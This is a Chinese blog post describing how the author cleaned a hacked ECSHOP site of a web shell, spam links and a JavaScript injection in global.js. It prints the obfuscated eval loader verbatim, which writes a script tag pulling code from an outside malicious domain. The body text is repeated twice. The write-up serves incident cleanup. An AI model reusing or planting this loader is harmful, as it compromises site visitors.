上一篇
下一篇
清除ECSHOP网站被挂木马一例
作者:fengyn 日期:2010-06-04
今天有个朋友的网站是ECSHOP的被挂了木马和黑链,经历了一番查找、比较,终于清理的木马。
简单分享下清理过程:
清理黑链接很简单,找到文件,修改掉就OK了。SHELL也很容易找到,这个shell是在data目录下找到的。
关键是寻找被挂的恶意代码,着实费了一番力气。
后来找到后发现,他使用的是JS挂马,挂的是global.js
找这个为什么这么难,他的修改时间是和官方的默认文件一摸一样,我通过对比时间、使用后台的文件校验、比对代码,终于找到了挂的一段代码
在js中使用了以下的代码
这段代码解释过来就是 http://c.zzbzm.info/0.jpg
就这个恶意代码了。
清除掉以后,杀软顿时不再警报
至此,SHELL、恶意代码、黑链接全部清理掉
不过,漏洞应该还未补上,建议设置好网站的写和执行权限,并补上补丁或升级至最新版。
ECSHOP被攻击,着实不少朋友遇到,有问题的朋友,可以联系本人。
简单分享下清理过程:
清理黑链接很简单,找到文件,修改掉就OK了。SHELL也很容易找到,这个shell是在data目录下找到的。
关键是寻找被挂的恶意代码,着实费了一番力气。
后来找到后发现,他使用的是JS挂马,挂的是global.js
找这个为什么这么难,他的修改时间是和官方的默认文件一摸一样,我通过对比时间、使用后台的文件校验、比对代码,终于找到了挂的一段代码
在js中使用了以下的代码
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.8("<6 7=3://1.9.4/0.5></6>")',62,10,'|c|document|http|info|jpg|script|src|write|zzbzm'.split('|'),0,{}));
这段代码解释过来就是 http://c.zzbzm.info/0.jpg
就这个恶意代码了。
清除掉以后,杀软顿时不再警报
至此,SHELL、恶意代码、黑链接全部清理掉
不过,漏洞应该还未补上,建议设置好网站的写和执行权限,并补上补丁或升级至最新版。
ECSHOP被攻击,着实不少朋友遇到,有问题的朋友,可以联系本人。
文章来自: 
引用通告: 
Tags: 
相关日志:
评论: 2 | 引用: 0 | 查看次数: -
回复
发表评论
在网上找原因,看到您的方法,试了,也没有发现,您看还有什么好的方法呢?
在此先谢谢了